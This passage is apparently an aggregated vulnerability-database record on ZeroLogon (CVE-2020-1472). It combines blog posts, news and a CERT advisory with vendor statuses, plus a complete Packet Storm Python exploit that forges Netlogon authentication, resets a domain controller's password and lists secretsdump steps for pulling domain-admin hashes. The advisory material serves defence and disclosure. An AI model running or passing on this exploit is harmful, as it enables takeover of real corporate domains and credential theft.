[CVE-2020-1472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472>):\n\n> \u201cAn elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka &#x27;Netlogon Elevation of Privilege Vulnerability&#x27;.\u201d\n\nThis vulnerability exploits a cryptographic flaw in Microsoft\u2019s Active Directory Netlogon Remote Protocol (MS-NRPC), which allows users to log on to servers that are using NTLM (NT LAN Manager). Researchers explained that the issue stems from the incorrect use of AES-CFB8 encryption, which requires randomly generated initialization vectors for each authentication message. Sadly, Windows didn&#x27;t take this requirement into consideration. An attacker can use zeros for the initialization vector, allowing them to take over a domain controller in a matter of seconds.\n\n### How bad is this vulnerability?\n\nVery bad, is the short answer. ZeroLogon has been successfully weaponized by malware authors, who use it for the lateral infection of corporate endpoints. The sophisticated [Trickbot](<https://blog.malwarebytes.com/detections/trojan-trickbot/>) Trojan uses ZeroLogon, which means that it can spread across a vulnerable network easily. [Ryuk ransomware has also been seen](<https://blog.malwarebytes.com/videobytes/2020/12/videobytes-ryuk-ransomware-targeting-us-hospitals/>) using the ZeroLogon vulnerability. \n\n### Is there a patch?\n\nYes, but there&#x27;s a &quot;but&quot;. The vulnerability was actually patched in August 2020, and it wasn\u2019t until a researcher published a report about the vulnerability in September that we started to see it used in malicious activity.\n\nIn late October, Microsoft [warned](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) that threat actors were actively exploiting systems that were unpatched against ZeroLogon privilege escalation.\n\nIn November Microsoft also added detection rules to Microsoft Defender to \u201cdetect adversaries as they try to exploit this vulnerability against your domain controllers.\u201d\n\nThe general advice is to use [Secure RPC](<https://docs.oracle.com/cd/E19683-01/806-4078/6jd6cjrte/index.html>) to prevent these attacks. Secure RPC is an authentication method that authenticates both the host and the user who is making a request for a service. Secure RPC uses the Diffie-Hellman authentication mechanism, which uses DES encryption rather than AES-CFB8.\n\n### Why isn\u2019t everything patched against ZeroLogon by now?\n\nThe problem with the patch is that it is not enough to update the server side (Domain Controller), because clients also need to be updated for the protocol to work. And even though Microsoft took care to issue patches for Windows devices, it didn\u2019t provide a solution for legacy operating systems that are no longer supported, or for third-party products. This means that enforcing Secure RPC may break operations for these incompatible systems.\n\n### So, what\u2019s next?\n\nNow, Microsoft has announced that it will enforce the use of Secure RPC .\n\n> \u201cbeginning with the February 9, 2021 Security Update release we will be enabling Domain Controller enforcement mode by default. This will block vulnerable connections from non-compliant devices. DC enforcement mode requires that all Windows and non-Windows devices use Secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the non-compliant device.\u201d\n\nHaving read that you might be thinking: &quot;But you said it might break incompatible systems!&quot; True, so Microsoft has made a list of actions that will result in a detailed update plan.\n\n[The update plan outlined by Microsoft](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>) includes the following actions:\n\n * UPDATE your Domain Controllers with an update released August 11, 2020 or later.\n * FIND which devices are making vulnerable connections by monitoring event logs.\n * ADDRESS non-compliant devices making vulnerable connections.\n * [ENABLE](<https://support.microsoft.com/help/4557222#EnablingEnforcementMode>) enforcement mode to address CVE-2020-1472 in your environment.\n\nThis probably means there is still no happy ending to this story. Addressing the non-complaint devices will not be as easy at it sounds, in many cases. In many cases it will end with sysadmins making an exception for such a device. It is advisable however to at least try and follow the steps. Because in the end it will pay off to remove (or at least limit) the vulnerable devices and machines on your network. The cybercriminals will not let go of this treasure so easily.\n\nStay safe, everyone!\n\nThe post [The story of ZeroLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/the-story-of-zerologon/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-01-19T18:37:09", "published": "2021-01-19T18:37:09", "id": "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/the-story-of-zerologon/", "type": "malwarebytes", "title": "The story of ZeroLogon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-09-29T17:43:46", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "Cisco Talos is tracking a spike in exploitation attempts against the Microsoft vulnerability CVE-2020-1472, an elevation of privilege bug in Netlogon, outlined in the August Microsoft Patch Tuesday report. The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol which \u2014 among other things \u2014 can be used to update computer passwords by forging an authentication token for specific Netlogon functionality. This flaw allows attackers to... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "modified": "2020-09-29T09:04:58", "published": "2020-09-29T09:04:58", "id": "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/WSY_D8SbuKs/netlogon-rises.html", "type": "talosblog", "title": "Microsoft Netlogon exploitation continues to rise", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-11-18T23:15:12", "description": "", "published": "2020-11-18T00:00:00", "type": "packetstorm", "title": "Zerologon Netlogon Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-1472"], "modified": "2020-11-18T00:00:00", "id": "PACKETSTORM:160127", "href": "https://packetstormsecurity.com/files/160127/Zerologon-Netlogon-Privilege-Escalation.html", "sourceData": "`# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege \n# Date: 2020-10-04 \n# Exploit Author: West Shepherd \n# Vendor Homepage: https://www.microsoft.com \n# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 \n# Tested on: Microsoft Windows Server 2016 Standard x64 \n# CVE : CVE-2020-1472 \n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code \n# Sources: https://www.secura.com/pathtoimg.php?id=2055 \n# Requirements: python3 and impacket 0.9.21+ (tested using this version) \n#!/usr/bin/env python3 \nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs \nfrom binascii import hexlify, unhexlify \nfrom subprocess import check_call \nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED \nfrom impacket.dcerpc.v5 import nrpc, epm, transport \nfrom impacket import crypto, version \nfrom impacket.examples import logger \nfrom Cryptodome.Cipher import AES \nfrom struct import pack, unpack \nfrom impacket.dcerpc.v5.rpcrt import DCERPCException \n \n \nclass Exploit: \ndef __init__( \nself, \nname='', \naddress='', \nattempts=2000, \npassword='' \n): \nname = name.rstrip('$') \nself.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\\ \n.ServerSecureChannel \nself.authenticator = self.getAuthenticator(stamp=0) \nself.clearNewPasswordBlob = b'\\x00' * 516 \nself.primaryName = ('\\\\\\\\%s' % name) + '\\x00' \nself.accountName = ('%s$' % name) + '\\x00' \nself.computerName = name + '\\x00' \nself.clientCredential = b'\\x00' * 8 \nself.clientChallenge = b'\\x00' * 8 \nself.negotiateFlags = 0x212fffff \nself.address = address \nself.max = attempts \nself.dce = None \nself.sessionKey = None \nself.clientStoredCredential = None \nself.password = password \n \ndef encodePassword(self, password): \nif isinstance(password, str): \npassword = password.encode('utf-8') \nreturn b'\\x00' * (512 - len(password))\\ \n+ password \\ \n+ pack('<L', len(password)) \n \ndef getAuthenticator(self, creds=b'\\x00' * 8, stamp=10): \nauthenticator = nrpc.NETLOGON_AUTHENTICATOR() \nauthenticator['Credential'] = creds \nauthenticator['Timestamp'] = stamp \nreturn authenticator \n \ndef serverReqChallenge(self): \ntry: \nbinding = epm.hept_map( \nself.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp' \n) \nself.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc() \nself.dce.connect() \nself.dce.bind(nrpc.MSRPC_UUID_NRPC) \nreturn nrpc.hNetrServerReqChallenge( \nself.dce, \nself.primaryName, \nself.computerName, \nself.clientChallenge \n) \nexcept BaseException as ex: \nself.logError(ex) \n \ndef serverAuthenticate(self): \ntry: \nauth = nrpc.hNetrServerAuthenticate3( \nself.dce, \nself.primaryName, \nself.accountName, \nself.secureChannelType, \nself.computerName, \nself.clientCredential, \nself.negotiateFlags \n) \nassert auth['ErrorCode'] == 0 \nself.logInfo('successfully authenticated') \nreturn True \nexcept nrpc.DCERPCSessionError as ex: \nself.dce = None \nif ex.get_error_code() == 0xc0000022: \nreturn None \nelse: \nself.logFail(ex.get_error_code()) \nexcept BaseException as ex: \nself.dce = None \nself.logFail(ex) \nself.dce = None \n \ndef serverPasswordSet(self): \ntry: \nreturn nrpc.hNetrServerPasswordSet2( \nself.dce, \nself.primaryName, \nself.accountName, \nself.secureChannelType, \nself.computerName, \nself.authenticator, \nself.clearNewPasswordBlob \n) \nexcept BaseException as ex: \nself.logError(ex) \n \ndef authenticate(self): \nself.logInfo( \n'checking target, attempting to authenticate %d max \nattempts' % self.max \n) \nfor attempt in range(0, self.max): \nself.logInfo('attempt %d' % attempt) \nself.serverReqChallenge() \nself.serverAuthenticate() \nif self.dce is not None: \nbreak \nif self.dce: \nreturn True \nelse: \nself.logError('failed to authenticate') \n \ndef exploit(self): \nself.logInfo('attempting password reset') \nreset = self.serverPasswordSet() \nif reset['ErrorCode'] == 0: \nself.logInfo('successfully reset password') \nelse: \nself.logError('failed to reset password') \nreturn self \n \ndef ComputeNetlogonCredentialAES(self, challenge): \nreturn nrpc.ComputeNetlogonCredentialAES( \nchallenge, \nself.sessionKey \n) \n \ndef logInfo(self, message): \nsys.stdout.write(\"[+] %s\\n\" % str(message)) \nreturn self \n \ndef logError(self, message): \nsys.stderr.write(\"[-] error %s\\n\" % str(message)) \n \ndef logFail(self, message): \nsys.stderr.write(\"[!] failure %s\\n\" % str(message)) \nsys.exit(2) \n \ndef restore(self): \nself.logInfo('attempting to restore password') \nself.clientChallenge = b'12345678' \ntry: \nself.primaryName = NULL \nchallenge = self.serverReqChallenge() \nself.sessionKey = nrpc.ComputeSessionKeyAES( \n'', self.clientChallenge, challenge['ServerChallenge'] \n) \nself.clientCredential = self.ComputeNetlogonCredentialAES( \nself.clientChallenge \n) \ntry: \nself.serverAuthenticate() \nexcept Exception as e: \nif str(e).find('STATUS_DOWNGRADE_DETECTED') < 0: \nraise \nself.logInfo('restoring password') \nself.clientStoredCredential = pack('<Q', unpack('<Q', \nself.clientCredential)[0] + 10) \nself.authenticator = self.getAuthenticator( \n \ncreds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential) \n) \nself.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES( \nself.encodePassword(self.password) \n) \nreset = self.serverPasswordSet() \nif reset['ErrorCode'] == 0: \nself.logInfo('successfully restored password') \nelse: \nself.logError('failed to restore password') \nexcept Exception as ex: \nself.logError(ex) \nreturn self \n \n \nif __name__ == '__main__': \ninfo = \"\"\" \nNOTE - Exploitation will break the DC until restored, recommended guidelines: \n \n1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN: \ncve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP> \n \n2. Exploit the DC - this will break the DC until restored: \ncve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP> \n \n3. Dump the DC - for the DA hashes, this will not contain the \nmachine hex-pass: \nsecretsdump.py -just-dc -no-pass <NETBIOS NAME>\\$@<IP> \n \n4. Dump the DC again - use the DA hash to get the machines hex-pass: \nsecretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP> \n \n5. Restore target - this fixes the DC: \ncve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> \n-hex <HEXPASS> \n\"\"\" \nparser = argparse.ArgumentParser( \ndescription='CVE-2020-1472 ZeroLogon Exploit - Netlogon \nElevation of Privilege', \nadd_help=True \n) \ntry: \nparser.add_argument('-do', default='check', action='store', \nhelp='What to do (default check): \n[check|restore|exploit]') \nparser.add_argument('-target', action='store', \nhelp='NETBIOS name of target DC (not the FQDN)') \nparser.add_argument('-ip', action='store', \nhelp='IP address of target DC') \nparser.add_argument('-password', default='', action='store', \nhelp='The plaintext password to use to \nreset the DC') \nparser.add_argument('-hex', default='', action='store', \nhelp='The hex password to use to restore \nthe DC (recommended)') \nparser.add_argument('-max', default=2000, action='store', \nhelp='Max attempts to authenticate with \nthe DC (usually ~300 or less)') \n \nif len(sys.argv) < 3: \nparser.print_help() \nprint(info) \nsys.exit(1) \noptions = parser.parse_args() \n \nif options.do.lower() == 'check': \nExploit( \nname=options.target, \naddress=options.ip, \nattempts=int(options.max) \n).authenticate() \nelif options.do.lower() == 'exploit': \nexp = Exploit( \nname=options.target, \naddress=options.ip, \nattempts=int(options.max) \n) \nif exp.authenticate(): \nexp.exploit() \nelif options.do.lower() == 'restore': \nif options.hex != '' and options.password == '': \noptions.password = unhexlify(options.hex) \nif options.password != '': \nexp = Exploit( \nname=options.target, \naddress=options.ip, \npassword=options.password \n).restore() \nelse: \nparser.print_help() \n \nexcept Exception as error: \nsys.stderr.write('[-] error in main %s\\n' % str(error)) \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160127/zerologon-poc.txt"}], "krebs": [{"lastseen": "2020-09-24T17:42:40", "bulletinFamily": "blog", "cvelist": ["CVE-2020-1472"], "description": "**Microsoft** warned on Wednesday that malicious hackers are exploiting a particularly dangerous flaw in **Windows Server** systems that could be used to give attackers the keys to the kingdom inside a vulnerable corporate network. Microsoft&#x27;s warning comes just days after the **U.S. Department of Homeland Security** issued an emergency directive instructing all federal agencies to patch the vulnerability by Sept. 21 at the latest.\n\n\n\nDHS&#x27;s **Cybersecurity and Infrastructure Agency** (CISA) said [in the directive](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/18/cisa-releases-emergency-directive-microsoft-windows-netlogon>) that it expected imminent exploitation of the flaw -- [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) and dubbed &quot;ZeroLogon&quot; -- because exploit code which can be used to take advantage of it [was circulating online](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>).\n\nLast night, Microsoft&#x27;s Security Intelligence unit [tweeted](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) that the company is &quot;tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon vulnerability.&quot;\n\n&quot;We have observed attacks where public exploits have been incorporated into attacker playbooks,&quot; Microsoft said. &quot;We strongly recommend customers to immediately apply security updates.&quot;\n\nMicrosoft [released a patch for the vulnerability in August](<https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/>), but it is not uncommon for businesses to delay deploying updates for days or weeks while testing to ensure the fixes do not interfere with or disrupt specific applications and software.\n\nCVE-2020-1472 earned Microsoft&#x27;s most-dire &quot;critical&quot; severity rating, meaning attackers can exploit it with little or no help from users. The flaw is present in most supported versions of Windows Server, from **Server 2008** through **Server 2019**.\n\nThe vulnerability could let an unauthenticated attacker gain administrative access to a Windows domain controller and run an application of their choosing. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\n**Scott Caveza**, research engineering manager at security firm [Tenable](<https://www.tenable.com>), said several samples of malicious .NET executables with the filename \u2018SharpZeroLogon.exe\u2019 have been uploaded to VirusTotal, a service owned by Google that scans suspicious files against dozens of antivirus products.\n\n&quot;Given the flaw is easily exploitable and would allow an attacker to completely take over a Windows domain, it should come as no surprise that we\u2019re seeing attacks in the wild,&quot; Caveza said. &quot;Administrators should prioritize patching this flaw as soon as possible. Based on the rapid speed of exploitation already, we anticipate this flaw will be a popular choice amongst attackers and integrated into malicious campaigns.&quot;", "modified": "2020-09-24T17:00:51", "published": "2020-09-24T17:00:51", "id": "KREBS:952ACEBFD55EBD076910C6B233491883", "href": "https://krebsonsecurity.com/2020/09/microsoft-attackers-exploiting-zerologon-windows-flaw/", "type": "krebs", "title": "Microsoft: Attackers Exploiting \u2018ZeroLogon\u2019 Windows Flaw", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-01-04T23:45:02", "bulletinFamily": "info", "cvelist": ["CVE-2020-1472"], "description": "### Overview\n\nThe Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode. This allows an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and potentially obtain domain administrator privileges.\n\n### Description\n\nThe Microsoft Windows Netlogon Remote Protocol (MS-NRPC) is a core authentication component of Active Directory that provides authentication for user and computer accounts. MS-NRPC uses [an initialization vector (IV) of 0 (zero)](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/13db7494-6d2c-4448-be8f-cb5ba03e95d6>) in AES-CFB8 mode when authenticating computer accounts.\n\n[_Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)_](<https://www.secura.com/pathtoimg.php?id=2055>) describes how this cryptographic failure allows a trivial statistical attack on the MS-NRPC authentication handshake:\n\n> The ComputeNetlogonCredential function, however, defines that this IV is fixed and should always consist of 16 zero bytes. This violates the requirements for using AES-CFB8 securely: its security properties only hold when IVs are random.\n> \n> ...\n> \n> When encrypting a message consisting only of zeroes, with an all-zero IV, there is a 1 in 256 chance that the output will only contain zeroes as well.\n\nBy choosing a client challenge and ClientCredential of all zeros, an attacker has a 1 in 256 chance of successfully authenticating as any domain-joined computer. By impersonating a domain controller, an attacker can take additional steps to change a computer's Active Directory password ([Exploit step 4: changing a computer\u2019s AD password](<https://www.secura.com/pathtoimg.php?id=2055>)) and potentially gain domain administrator privileges ([Exploit step 5: from password change to domain admin](<https://www.secura.com/pathtoimg.php?id=2055>)).\n\nBecause Samba has implemented the MS-NRPC protocol as it has been designed by Microsoft, Samba domain controllers are also affected by this vulnerability.\n\n### Impact\n\nAn unauthenticated attacker with network access to a domain controller can impersonate any domain-joined computer, including a domain controller. Among other actions, the attacker can set an empty password for the domain controller's Active Directory computer account, causing a denial of service, and potentially allowing the attacker to gain domain administrator privileges.\n\nThe compromise of Active Directory infrastructure is likely a significant and costly impact.\n\n### Solution\n\n#### Apply an update\n\nOn August 11, 2020, Microsoft issued [an advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) that provides updates for this vulnerability.\n\n#### Enable secure RPC enforcement mode\n\nThe August 2020 updates for CVE-2020-1472 include changes to domain controllers that can optionally be enabled to [require secure RPC](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) for Netlogon secure channel connections. The changes to require secure RPC must be made to receive the most complete protection from this vulnerability. For systems that have the August 2020 update for CVE-2020-1472, enabling secure RPC [enforcement mode](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc#EnforcementMode>) will change domain controller behavior to require Netlogon secure channel connections using secure [MS-NRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f>). This change to enable enforcement mode will be deployed automatically on or after February 9, 2021.\n\n### Acknowledgements\n\nMicrosoft acknowledges Tom Tervoort of Secura for reporting this vulnerability.\n\nThis document was written by Eric Hatleback, Art Manion, and Will Dormann.\n\n### Vendor Information \n\n490028\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Alpine Linux Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arch Linux Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### CentOS Affected\n\nUpdated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Debian GNU/Linux Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Fedora Project Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Geexbox Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Gentoo Linux Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Google Affected\n\nNotified: 2020-09-17 Updated: 2020-10-01\n\n**Statement Date: September 29, 2020**\n\n**CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### HardenedBSD __ Affected\n\nNotified: 2020-09-17 Updated: 2020-09-21\n\n**Statement Date: September 18, 2020**\n\n**CVE-2020-1472**| Affected \n---|--- \n**Vendor Statement:** \nHardenedBSD is not affected. \n \n#### Vendor Statement\n\nHardenedBSD provides Samba as a third-party package, not installed by default.\n\n### Micro Focus Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Microsoft __ Affected\n\nNotified: 2020-09-16 Updated: 2020-09-16 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>\n * <https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>\n\n### NetBSD Affected\n\nNotified: 2020-09-17 Updated: 2020-10-01\n\n**Statement Date: September 28, 2020**\n\n**CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Red Hat Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Red Hat Inc. Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SUSE Linux Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Samba __ Affected\n\nNotified: 2020-09-15 Updated: 2020-09-21\n\n**Statement Date: September 16, 2020**\n\n**CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nSamba domain controllers (AD and NT4-like) can be impacted by the ZeroLogon CVE-2020-1472 vulnerability, but supported versions are not impacted in the default configuration.\n\nSamba, like Microsoft, suggest that `\"server schannel = yes\"` must be set for secure operation. This is Samba's equivalent to Microsoft's `FullSecureChannelProtection=1` registry key.\n\nThe key difference between Samba and Microsoft Windows is that it's already enabled by default in all Samba major versions released since March 2018 (Samba 4.8 and later).\n\nThere seem to be some legacy software, which still requires `\"server schannel = auto\"`. Samba will soon add additional hardening that will allow administrators to use `\"server schannel = yes\"` globally and define exceptions only for specified computer accounts.\n\nSamba's progress can be monitored via this bug: https://bugzilla.samba.org/show_bug.cgi?id=14497\n\n#### References\n\n * <https://www.samba.org/samba/security/CVE-2020-1472.html>\n * <https://bugzilla.samba.org/show_bug.cgi?id=14497>\n * <https://lists.samba.org/archive/samba/2020-September/232011.html>\n * <https://wiki.samba.org/index.php/Samba_Security_Documentation>\n * <https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html>\n\n#### CERT Addendum\n\nSamba [requires secure Netlogon connections by default since version 4.8](<https://wiki.samba.org/index.php/Samba_Security_Documentation#NETLOGON_Secure_Channel_.28Schannel.29>). Versions of Samba prior to 4.8 are vulnerable by default. Samba versions 4.8 and later are vulnerable if they are configured to override the [server schannel](<https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html#SERVERSCHANNEL>) default value to \"auto\" or \"no\".\n\n### Slackware Linux Inc. Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology __ Affected\n\nNotified: 2020-09-17 Updated: 2020-09-18\n\n**Statement Date: September 17, 2020**\n\n**CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nSynology confirms the Synology Directory Server is affected and has published a security advisory Synology-SA-20:21 to respond to CVE-2020-1472.\n\n#### References\n\n * <https://www.synology.com/security/advisory/Synology_SA_20_21>\n * <https://www.synology.com/dsm/feature/active_directory>\n\n### Turbolinux Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubuntu Affected\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Univention __ Affected\n\nUpdated: 2020-09-17 **CVE-2020-1472**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://help.univention.com/t/status-of-zerologon-cve-2020-1472-security-issue-in-ucs/16107>\n * <https://forge.univention.org/bugzilla/show_bug.cgi?id=52041>\n\n### Blackberry QNX Not Affected\n\nNotified: 2020-09-17 Updated: 2020-09-21\n\n**Statement Date: September 21, 2020**\n\n**CVE-2020-1472**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2020-09-17 Updated: 2020-09-28\n\n**Statement Date: September 25, 2020**\n\n**CVE-2020-1472**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### FreeBSD Project __ Not Affected\n\nNotified: 2020-09-18 Updated: 2020-09-21\n\n**Statement Date: September 19, 2020**\n\n**CVE-2020-1472**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nFreeBSD does not include support for MS-NRPC in the base system. Users who install third-party software (e.g. Samba) from ports or packages may be affected.\n\n### Illumos __ Not Affected\n\nNotified: 2020-09-17 Updated: 2020-09-18\n\n**Statement Date: September 18, 2020**\n\n**CVE-2020-1472**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nOnly AD domain controller implementations are potentially at risk, as detailed in the linked paper. (DC server \u201cNetLogon\u201d functions are the attack surface for this vulnerability.) We do not implement a domain controller, therefore we are NOT VULNERABLE.\n\nWe are AFFECTED, because our AD clients will need adjustment to a world that fixes this vulnerability, however. See https://www.illumos.org/issues/13169\n\n### Joyent __ Not Affected\n\nNotified: 2020-09-17 Updated: 2020-09-18\n\n**Statement Date: September 18, 2020**\n\n**CVE-2020-1472**| Not Affected \n---|--- \n**Vendor Statement:** \nOnly AD domain controller implementations are potentially at risk, as detailed in the linked paper. (DC server \u201cNetLogon\u201d functions are the attack surface for this vulnerability.) We do not implement a domain controller, therefore we are not vulnerable. \n \n#### Vendor Statement\n\nOnly AD domain controller implementations are potentially at risk, as detailed in the linked paper. (DC server \u201cNetLogon\u201d functions are the attack surface for this vulnerability.) We do not implement a domain controller, therefore we are NOT VULNERABLE to the attack.\n\nWe are _AFFECTED_ insofar as illumos SMB/CIFS clients will need to be adjusted to interoperate with DCs that address this vulnerability.\n\nhttps://www.illumos.org/issues/13169\n\n#### References\n\n * <https://www.secura.com/pathtoimg.php?id=2055>\n\n### Amazon Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Apple Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arista Networks Inc. Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Aspera Inc. Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell EMC Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### DesktopBSD Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### DragonFly BSD Project Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### HP Inc. Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hewlett Packard 